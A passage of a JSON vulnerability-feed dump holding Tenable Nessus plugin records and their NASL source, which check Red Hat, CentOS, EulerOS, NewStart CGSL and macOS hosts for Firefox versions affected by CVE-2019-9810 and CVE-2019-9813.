\"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(version:version, path:path, product:'firefox', esr:TRUE, fix:'60.6.1', min:'60.0.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:21:05", "description": "An update for firefox is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 10, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "RHEL 6 : firefox (RHSA-2019:0672)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-03-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-0672.NASL", "href": "https://www.tenable.com/plugins/nessus/123434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0672. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"RHSA\", value:\"2019:0672\");\n\n script_name(english:\"RHEL 6 : firefox (RHSA-2019:0672)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9813\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0672\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:29:49", "description": "An update for firefox is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-02T00:00:00", "title": "CentOS 7 : firefox (CESA-2019:0671)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:firefox"], "id": "CENTOS_RHSA-2019-0671.NASL", "href": "https://www.tenable.com/plugins/nessus/123558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0671 and \n# CentOS Errata and Security Advisory 2019:0671 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123558);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2020/02/18\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"RHSA\", value:\"2019:0671\");\n\n script_name(english:\"CentOS 7 : firefox (CESA-2019:0671)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2019-April/023257.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7077c31f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9810\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"firefox-60.6.1-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:58:08", "description": "According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP2 : firefox (EulerOS-SA-2019-1570)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-05-29T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:firefox", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1570.NASL", "href": "https://www.tenable.com/plugins/nessus/125497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125497);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2019-9810\",\n \"CVE-2019-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : firefox (EulerOS-SA-2019-1570)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1570\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5e656b23\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-60.6.1-1.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:03:04", "description": "The remote NewStart CGSL host, running version MAIN 4.06, has firefox packages installed that are affected by multiple\nvulnerabilities:\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. This vulnerability\n affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and\n Thunderbird < 60.6.1. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write. This\n vulnerability affects Firefox < 66.0.1, Firefox ESR <\n 60.6.1, and Thunderbird < 60.6.1. (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL MAIN 4.06 : firefox Multiple Vulnerabilities (NS-SA-2019-0095)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0095_FIREFOX.NASL", "href": "https://www.tenable.com/plugins/nessus/127318", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0095. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127318);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_bugtraq_id(107548);\n\n script_name(english:\"NewStart CGSL MAIN 4.06 : firefox Multiple Vulnerabilities (NS-SA-2019-0095)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.06, has firefox packages installed that are affected by multiple\nvulnerabilities:\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. This vulnerability\n affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and\n Thunderbird < 60.6.1. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write. This\n vulnerability affects Firefox < 66.0.1, Firefox ESR <\n 60.6.1, and Thunderbird < 60.6.1. (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0095\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL firefox packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.06\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.06');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.06\": [\n \"firefox-60.7.0-1.el6.centos\",\n \"firefox-debuginfo-60.7.0-1.el6.centos\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:21:57", "description": "The version of Firefox installed on the remote macOS or Mac OS X host\nis prior to 66.0.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Mozilla Firefox < 66.0.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MACOS_FIREFOX_66_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-09.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123011);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-09\");\n\n script_name(english:\"Mozilla Firefox < 66.0.1\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote macOS or Mac OS X host\nis prior to 66.0.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. 